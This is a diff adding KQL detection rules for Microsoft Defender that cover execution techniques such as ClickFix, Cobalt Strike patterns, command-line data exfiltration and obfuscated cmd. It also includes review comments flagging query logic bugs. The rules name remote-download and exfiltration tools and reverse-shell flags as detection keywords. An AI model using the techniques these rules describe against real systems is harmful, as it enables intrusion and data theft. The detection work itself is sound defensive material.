@@ -0,0 +1,10 @@
+// Title: PCRE.NET Package Temp Files
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-29
+// Level: high
+// Description: Detects processes creating temp files related to PCRE.NET package
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\"
\ No newline at end of file
diff --git a/KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql b/KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql
new file mode 100644
index 00000000..fc9fcce2
--- /dev/null
+++ b/KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: PDQ Deploy Remote Adminstartion Tool Execution
+// Author: frack113
+// Date: 2022-10-01
+// Level: medium
+// Description: Detect use of PDQ Deploy remote admin tool
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1072
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "PDQ Deploy Console" or ProcessVersionInfoProductName =~ "PDQ Deploy" or ProcessVersionInfoCompanyName =~ "PDQ.com" or ProcessVersionInfoOriginalFileName =~ "PDQDeployConsole.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/perl_inline_command_execution.kql b/KQL/rules/Execution/perl_inline_command_execution.kql
new file mode 100644
index 00000000..5d7cc9ad
--- /dev/null
+++ b/KQL/rules/Execution/perl_inline_command_execution.kql
@@ -0,0 +1,10 @@
+// Title: Perl Inline Command Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -e" and (FolderPath endswith "\\perl.exe" or ProcessVersionInfoOriginalFileName =~ "perl.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/php_inline_command_execution.kql b/KQL/rules/Execution/php_inline_command_execution.kql
new file mode 100644
index 00000000..4ed236fa
--- /dev/null
+++ b/KQL/rules/Execution/php_inline_command_execution.kql
@@ -0,0 +1,10 @@
+// Title: Php Inline Command Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -r" and (FolderPath endswith "\\php.exe" or ProcessVersionInfoOriginalFileName =~ "php.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql b/KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql
new file mode 100644
index 00000000..0c8438aa
--- /dev/null
+++ b/KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Arbitrary Command Execution Via FTP.EXE
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\ftp.exe" or ((ProcessCommandLine contains "-s:" or ProcessCommandLine contains "/s:" or ProcessCommandLine contains "–s:" or ProcessCommandLine contains "—s:" or ProcessCommandLine contains "―s:") and (FolderPath endswith "\\ftp.exe" or ProcessVersionInfoOriginalFileName =~ "ftp.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql b/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql
new file mode 100644
index 00000000..d9f7fb35
--- /dev/null
+++ b/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql
@@ -0,0 +1,13 @@
+// Title: Potential Arbitrary File Download Via Cmdl32.EXE
+// Author: frack113
+// Date: 2021-11-03
+// Level: medium
+// Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags.
+Attackers can abuse this utility in order to download arbitrary files via a configuration file.
+Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/vpn" and ProcessCommandLine contains "/lan") and (FolderPath endswith "\\cmdl32.exe" or ProcessVersionInfoOriginalFileName =~ "CMDL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql b/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql
new file mode 100644
index 00000000..6d4b4137
--- /dev/null
+++ b/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql
@@ -0,0 +1,13 @@
+// Title: Potential Binary Impersonating Sysinternals Tools
+// Author: frack113, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2021-12-20
+// Level: medium
+// Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection.
+This rule looks for the execution of binaries that are named similarly to Sysinternals tools.
+Adversary may rename their malicious tools as legitimate Sysinternals tools to evade detection.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, attack.t1036.005
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\accesschk64a.exe" or FolderPath endswith "\\ADExplorer64a.exe" or FolderPath endswith "\\ADInsight64a.exe" or FolderPath endswith "\\adrestore64a.exe" or FolderPath endswith "\\Autologon64a.exe" or FolderPath endswith "\\Autoruns64a.exe" or FolderPath endswith "\\autorunsc64a.exe" or FolderPath endswith "\\Clockres64a.exe" or FolderPath endswith "\\Contig64a.exe" or FolderPath endswith "\\Coreinfo64a.exe" or FolderPath endswith "\\Dbgview64a.exe" or FolderPath endswith "\\disk2vhd64a.exe" or FolderPath endswith "\\diskext64a.exe" or FolderPath endswith "\\DiskView64a.exe" or FolderPath endswith "\\du64a.exe" or FolderPath endswith "\\FindLinks64a.exe" or FolderPath endswith "\\handle64a.exe" or FolderPath endswith "\\hex2dec64a.exe" or FolderPath endswith "\\junction64a.exe" or FolderPath endswith "\\LoadOrd64a.exe" or FolderPath endswith "\\LoadOrdC64a.exe" or FolderPath endswith "\\logonsessions64a.exe" or FolderPath endswith "\\movefile64a.exe" or FolderPath endswith "\\notmyfault64a.exe" or FolderPath endswith "\\notmyfaultc64a.exe" or FolderPath endswith "\\pendmoves64a.exe" or FolderPath endswith "\\pipelist64a.exe" or FolderPath endswith "\\procdump64a.exe" or FolderPath endswith "\\procexp64a.exe" or FolderPath endswith "\\Procmon64a.exe" or FolderPath endswith "\\PsExec64a.exe" or FolderPath 
endswith "\\psfile64a.exe" or FolderPath endswith "\\PsGetsid64a.exe" or FolderPath endswith "\\PsInfo64a.exe" or FolderPath endswith "\\pskill64a.exe" or FolderPath endswith "\\psloglist64a.exe" or FolderPath endswith "\\pspasswd64a.exe" or FolderPath endswith "\\psping64a.exe" or FolderPath endswith "\\PsService64a.exe" or FolderPath endswith "\\pssuspend64a.exe" or FolderPath endswith "\\RAMMap64a.exe" or FolderPath endswith "\\RegDelNull64a.exe" or FolderPath endswith "\\ru64a.exe" or FolderPath endswith "\\sdelete64a.exe" or FolderPath endswith "\\sigcheck64a.exe" or FolderPath endswith "\\streams64a.exe" or FolderPath endswith "\\strings64a.exe" or FolderPath endswith "\\sync64a.exe" or FolderPath endswith "\\Sysmon64a.exe" or FolderPath endswith "\\tcpvcon64a.exe" or FolderPath endswith "\\tcpview64a.exe" or FolderPath endswith "\\vmmap64a.exe" or FolderPath endswith "\\whois64a.exe" or FolderPath endswith "\\Winobj64a.exe" or FolderPath endswith "\\ZoomIt64a.exe") or (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe" or FolderPath endswith "\\AccessEnum.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADInsight.exe" or FolderPath endswith "\\ADInsight64.exe" or FolderPath endswith "\\adrestore.exe" or FolderPath endswith "\\adrestore64.exe" or FolderPath endswith "\\Autologon.exe" or FolderPath endswith "\\Autologon64.exe" or FolderPath endswith "\\Autoruns.exe" or FolderPath endswith "\\Autoruns64.exe" or FolderPath endswith "\\autorunsc.exe" or FolderPath endswith "\\autorunsc64.exe" or FolderPath endswith "\\Bginfo.exe" or FolderPath endswith "\\Bginfo64.exe" or FolderPath endswith "\\Cacheset.exe" or FolderPath endswith "\\Cacheset64.exe" or FolderPath endswith "\\Clockres.exe" or FolderPath endswith "\\Clockres64.exe" or FolderPath endswith "\\Contig.exe" or FolderPath endswith "\\Contig64.exe" or FolderPath endswith "\\Coreinfo.exe" or FolderPath 
endswith "\\Coreinfo64.exe" or FolderPath endswith "\\CPUSTRES.EXE" or FolderPath endswith "\\CPUSTRES64.EXE" or FolderPath endswith "\\ctrl2cap.exe" or FolderPath endswith "\\Dbgview.exe" or FolderPath endswith "\\dbgview64.exe" or FolderPath endswith "\\Desktops.exe" or FolderPath endswith "\\Desktops64.exe" or FolderPath endswith "\\disk2vhd.exe" or FolderPath endswith "\\disk2vhd64.exe" or FolderPath endswith "\\diskext.exe" or FolderPath endswith "\\diskext64.exe" or FolderPath endswith "\\Diskmon.exe" or FolderPath endswith "\\Diskmon64.exe" or FolderPath endswith "\\DiskView.exe" or FolderPath endswith "\\DiskView64.exe" or FolderPath endswith "\\du.exe" or FolderPath endswith "\\du64.exe" or FolderPath endswith "\\efsdump.exe" or FolderPath endswith "\\FindLinks.exe" or FolderPath endswith "\\FindLinks64.exe" or FolderPath endswith "\\handle.exe" or FolderPath endswith "\\handle64.exe" or FolderPath endswith "\\hex2dec.exe" or FolderPath endswith "\\hex2dec64.exe" or FolderPath endswith "\\junction.exe" or FolderPath endswith "\\junction64.exe" or FolderPath endswith "\\ldmdump.exe" or FolderPath endswith "\\listdlls.exe" or FolderPath endswith "\\listdlls64.exe" or FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe" or FolderPath endswith "\\loadOrd.exe" or FolderPath endswith "\\loadOrd64.exe" or FolderPath endswith "\\loadOrdC.exe" or FolderPath endswith "\\loadOrdC64.exe" or FolderPath endswith "\\logonsessions.exe" or FolderPath endswith "\\logonsessions64.exe" or FolderPath endswith "\\movefile.exe" or FolderPath endswith "\\movefile64.exe" or FolderPath endswith "\\notmyfault.exe" or FolderPath endswith "\\notmyfault64.exe" or FolderPath endswith "\\notmyfaultc.exe" or FolderPath endswith "\\notmyfaultc64.exe" or FolderPath endswith "\\ntfsinfo.exe" or FolderPath endswith "\\ntfsinfo64.exe" or FolderPath endswith "\\pendmoves.exe" or FolderPath endswith "\\pendmoves64.exe" or FolderPath endswith "\\pipelist.exe" or FolderPath 
endswith "\\pipelist64.exe" or FolderPath endswith "\\portmon.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procexp.exe" or FolderPath endswith "\\procexp64.exe" or FolderPath endswith "\\Procmon.exe" or FolderPath endswith "\\Procmon64.exe" or FolderPath endswith "\\psExec.exe" or FolderPath endswith "\\psExec64.exe" or FolderPath endswith "\\psfile.exe" or FolderPath endswith "\\psfile64.exe" or FolderPath endswith "\\psGetsid.exe" or FolderPath endswith "\\psGetsid64.exe" or FolderPath endswith "\\psInfo.exe" or FolderPath endswith "\\psInfo64.exe" or FolderPath endswith "\\pskill.exe" or FolderPath endswith "\\pskill64.exe" or FolderPath endswith "\\pslist.exe" or FolderPath endswith "\\pslist64.exe" or FolderPath endswith "\\psLoggedon.exe" or FolderPath endswith "\\psLoggedon64.exe" or FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe" or FolderPath endswith "\\pspasswd.exe" or FolderPath endswith "\\pspasswd64.exe" or FolderPath endswith "\\psping.exe" or FolderPath endswith "\\psping64.exe" or FolderPath endswith "\\psService.exe" or FolderPath endswith "\\psService64.exe" or FolderPath endswith "\\psshutdown.exe" or FolderPath endswith "\\psshutdown64.exe" or FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe" or FolderPath endswith "\\RAMMap.exe" or FolderPath endswith "\\RAMMap64.exe" or FolderPath endswith "\\RDCMan.exe" or FolderPath endswith "\\RegDelNull.exe" or FolderPath endswith "\\RegDelNull64.exe" or FolderPath endswith "\\regjump.exe" or FolderPath endswith "\\ru.exe" or FolderPath endswith "\\ru64.exe" or FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe" or FolderPath endswith "\\ShareEnum.exe" or FolderPath endswith "\\ShareEnum64.exe" or FolderPath endswith "\\shellRunas.exe" or FolderPath endswith "\\sigcheck.exe" or FolderPath endswith "\\sigcheck64.exe" or FolderPath endswith 
"\\streams.exe" or FolderPath endswith "\\streams64.exe" or FolderPath endswith "\\strings.exe" or FolderPath endswith "\\strings64.exe" or FolderPath endswith "\\sync.exe" or FolderPath endswith "\\sync64.exe" or FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\tcpvcon.exe" or FolderPath endswith "\\tcpvcon64.exe" or FolderPath endswith "\\tcpview.exe" or FolderPath endswith "\\tcpview64.exe" or FolderPath endswith "\\Testlimit.exe" or FolderPath endswith "\\Testlimit64.exe" or FolderPath endswith "\\vmmap.exe" or FolderPath endswith "\\vmmap64.exe" or FolderPath endswith "\\Volumeid.exe" or FolderPath endswith "\\Volumeid64.exe" or FolderPath endswith "\\whois.exe" or FolderPath endswith "\\whois64.exe" or FolderPath endswith "\\Winobj.exe" or FolderPath endswith "\\Winobj64.exe" or FolderPath endswith "\\ZoomIt.exe" or FolderPath endswith "\\ZoomIt64.exe")) and (not(((isnull(ProcessVersionInfoCompanyName) or isnull(ProcessVersionInfoProductName)) or ((ProcessVersionInfoCompanyName in~ ("Sysinternals - www.sysinternals.com", "Sysinternals")) or ProcessVersionInfoProductName startswith "Sysinternals"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql b/KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql
new file mode 100644
index 00000000..77221f2c
--- /dev/null
+++ b/KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql
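Review bot: The exclusion at the end of the `| where` line drops every event where `ProcessVersionInfoCompanyName` or `ProcessVersionInfoProductName` is null, so a binary with stripped or absent version resources — the typical shape of a renamed tool — is only alerted on if MDE reports the missing field as an empty string rather than null; I have not verified which the tenant's DeviceProcessEvents produces, but if it is null the most suspicious executions are silently excluded, and if it is `""` the `isnull()` branch is dead code. The intent (suppress telemetry gaps vs. catch stripped binaries) should be stated in a comment, and if the former is meant `isempty(ProcessVersionInfoCompanyName) or isempty(ProcessVersionInfoProductName)` covers both null and empty. Expect false positives from GNU/MSYS ports that share names on the list (`du.exe`, `strings.exe`, `whois.exe`, `sync.exe`) and carry non-Sysinternals company strings; this hunk has no `// False Positives:` section and should get one naming them.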
@@ -0,0 +1,12 @@
+// Title: Potential Binary Proxy Execution Via Cdb.EXE
+// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1106, attack.defense-evasion, attack.t1218, attack.t1127
+// False Positives:
+// - Legitimate use of debugging tools
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -cf ") and (FolderPath endswith "\\cdb.exe" or ProcessVersionInfoOriginalFileName =~ "CDB.Exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql b/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql
new file mode 100644
index 00000000..c5fae8b5
--- /dev/null
+++ b/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql
@@ -0,0 +1,16 @@
+// Title: Potential ClickFix Execution Pattern - Registry
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-03-25
+// Level: high
+// Description: Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links.
+ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages.
+Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content,
+such as one-liners that execute remotely hosted malicious files or scripts.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.001
+// False Positives:
+// - Legitimate applications using RunMRU with HTTP links
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "http://" or RegistryValueData contains "https://") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*" and ((RegistryValueData contains "account" or RegistryValueData contains "anti-bot" or RegistryValueData contains "botcheck" or RegistryValueData contains "captcha" or RegistryValueData contains "challenge" or RegistryValueData contains "confirmation" or RegistryValueData contains "fraud" or RegistryValueData contains "human" or RegistryValueData contains "identificator" or RegistryValueData contains "identity" or RegistryValueData contains "robot" or RegistryValueData contains "validation" or RegistryValueData contains "verification" or RegistryValueData contains "verify") or (RegistryValueData contains "%comspec%" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "cmd" or RegistryValueData contains "cscript" or RegistryValueData contains "curl" or RegistryValueData contains "mshta" or RegistryValueData contains "powershell" or RegistryValueData contains "pwsh" or RegistryValueData contains 
"regsvr32" or RegistryValueData contains "rundll32" or RegistryValueData contains "schtasks" or RegistryValueData contains "wget" or RegistryValueData contains "wscript"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql b/KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql
new file mode 100644
index 00000000..cc093543
--- /dev/null
+++ b/KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql
@@ -0,0 +1,10 @@
+// Title: Potential CobaltStrike Process Patterns
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-07-27
+// Level: high
+// Description: Detects potential process patterns related to Cobalt Strike beacon activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and (InitiatingProcessCommandLine contains "cmd.exe /C echo" and InitiatingProcessCommandLine contains " > \\\\.\\pipe")) or (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and InitiatingProcessCommandLine endswith "/C whoami") or (ProcessCommandLine endswith "cmd.exe /C whoami" and InitiatingProcessFolderPath startswith "C:\\Temp\\") or ((ProcessCommandLine contains "cmd.exe /c echo" and ProcessCommandLine contains "> \\\\.\\pipe") and (InitiatingProcessFolderPath endswith "\\runonce.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql b/KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql
new file mode 100644
index 00000000..99339f41
--- /dev/null
+++ b/KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql
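Review bot: `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*"` in the ClickFix hunk treats the trailing `*` as a literal character — KQL `endswith` has no wildcard — so it only matches keys that literally end in `RunMRU*`, and the rule never fires as written; the `*` is a leftover from the Sigma `endswith` pattern. As far as I know DeviceRegistryEvents puts the key path (ending in `\Explorer\RunMRU`) in `RegistryKey` and the MRU entry name in `RegistryValueName`, so the condition should be `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU"` (or `contains` if subkeys are wanted). Separately, the second keyword group includes `RegistryValueData contains "cmd"`, which matches any URL with that substring; the `http` and RunMRU constraints keep it narrow, but it is worth a mention under `// False Positives:`.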
@@ -0,0 +1,12 @@
+// Title: Potential CommandLine Path Traversal Via Cmd.EXE
+// Author: xknow @xknow_infosec, Tim Shelton
+// Date: 2020-06-11
+// Level: high
+// Description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+// False Positives:
+// - Java tools are known to produce false-positive when loading libraries
+
+DeviceProcessEvents
+| where (((InitiatingProcessCommandLine contains "/c" or InitiatingProcessCommandLine contains "/k" or InitiatingProcessCommandLine contains "/r") or (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/k" or ProcessCommandLine contains "/r")) and (InitiatingProcessFolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "cmd.exe") and (InitiatingProcessCommandLine =~ "/../../" or ProcessCommandLine contains "/../../")) and (not(ProcessCommandLine contains "\\Tasktop\\keycloak\\bin\\/../../jre\\bin\\java"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_cookies_session_hijacking.kql b/KQL/rules/Execution/potential_cookies_session_hijacking.kql
new file mode 100644
index 00000000..5744e7cb
--- /dev/null
+++ b/KQL/rules/Execution/potential_cookies_session_hijacking.kql
@@ -0,0 +1,10 @@
+// Title: Potential Cookies Session Hijacking
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: medium
+// Description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie data.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "\\s-c\\s" or ProcessCommandLine contains "--cookie-jar") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
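Review bot: `InitiatingProcessCommandLine =~ "/../../"` on the path-traversal `| where` line is a case-insensitive equality test, so the parent side only matches a command line that is exactly `/../../`, which never occurs; the sibling test on the same line uses `ProcessCommandLine contains "/../../"`, and the parent check should be `InitiatingProcessCommandLine contains "/../../"` to match it. Until that is fixed the rule effectively covers only the child-process side. Note also that the `\\Tasktop\\keycloak\\bin\\/../../jre\\bin\\java` exclusion is applied to `ProcessCommandLine` only, so the same Java false positive would still alert through the parent branch once the parent check works; applying the exclusion to `InitiatingProcessCommandLine` as well keeps the documented FP suppressed.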
diff --git a/KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql b/KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql
new file mode 100644
index 00000000..56d074aa
--- /dev/null
+++ b/KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql
@@ -0,0 +1,12 @@
+// Title: Potential Data Exfiltration Activity Via CommandLine Tools
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-02
+// Level: high
+// Description: Detects the use of various CLI utilities exfiltrating data via web requests
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and (ProcessCommandLine contains " -ur" and ProcessCommandLine contains " -me" and ProcessCommandLine contains " -b" and ProcessCommandLine contains " POST ") and (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or ((ProcessCommandLine contains "--ur" and FolderPath endswith "\\curl.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " --data ")) or ((ProcessCommandLine contains "--post-data" or ProcessCommandLine contains "--post-file") and FolderPath endswith "\\wget.exe")) and ((ProcessCommandLine matches regex "net\\s+view" or ProcessCommandLine matches regex "sc\\s+query") or (ProcessCommandLine contains "Get-Content" or ProcessCommandLine contains "GetBytes" or ProcessCommandLine contains "hostname" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "qprocess" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "ToBase64String" or ProcessCommandLine contains "whoami") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > " and 
ProcessCommandLine contains " C:\\"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql b/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql
new file mode 100644
index 00000000..e73ec42e
--- /dev/null
+++ b/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql
@@ -0,0 +1,15 @@
+// Title: Potential DLL Injection Via AccCheckConsole
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-06
+// Level: medium
+// Description: Detects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI.
+One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc.
+The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.threat-hunting
+// False Positives:
+// - Legitimate use of the UI Accessibility Checker
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -hwnd" or ProcessCommandLine contains " -process " or ProcessCommandLine contains " -window ") and (FolderPath endswith "\\AccCheckConsole.exe" or ProcessVersionInfoOriginalFileName =~ "AccCheckConsole.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_dosfuscation_activity.kql b/KQL/rules/Execution/potential_dosfuscation_activity.kql
new file mode 100644
index 00000000..e4dd8aca
--- /dev/null
+++ b/KQL/rules/Execution/potential_dosfuscation_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential Dosfuscation Activity
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-02-15
+// Level: medium
+// Description: Detects possible payload obfuscation via the commandline
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "^^" or ProcessCommandLine contains "^|^" or ProcessCommandLine contains ",;," or ProcessCommandLine contains ";;;;" or ProcessCommandLine contains ";; ;;" or ProcessCommandLine contains "(,(," or ProcessCommandLine contains "%COMSPEC:~" or ProcessCommandLine contains " c^m^d" or ProcessCommandLine contains "^c^m^d" or ProcessCommandLine contains " c^md" or ProcessCommandLine contains " cm^d" or ProcessCommandLine contains "^cm^d" or ProcessCommandLine contains " s^et " or ProcessCommandLine contains " s^e^t " or ProcessCommandLine contains " se^t "
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql b/KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql
new file mode 100644
index 00000000..84081c5a
--- /dev/null
+++ b/KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql
@@ -0,0 +1,12 @@
+// Title: Potential Dropper Script Execution Via WScript/CScript
+// Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects wscript/cscript executions of scripts located in user directories
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007
+// False Positives:
+// - Some installers might generate a similar behavior. An initial baseline is required
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe") and (ProcessCommandLine contains ".js" or ProcessCommandLine contains ".jse" or ProcessCommandLine contains ".vba" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".wsf") and (ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Tmp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql b/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql
new file mode 100644
index 00000000..86fe2b90
--- /dev/null
+++ b/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql
@@ -0,0 +1,13 @@
+// Title: Potential File Extension Spoofing Using Right-to-Left Override
+// Author: Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2024-11-17
+// Level: high
+// Description: Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1036.002
+// False Positives:
+// - Filenames that contains scriptures such as arabic or hebrew might make use of this character
+
+DeviceFileEvents
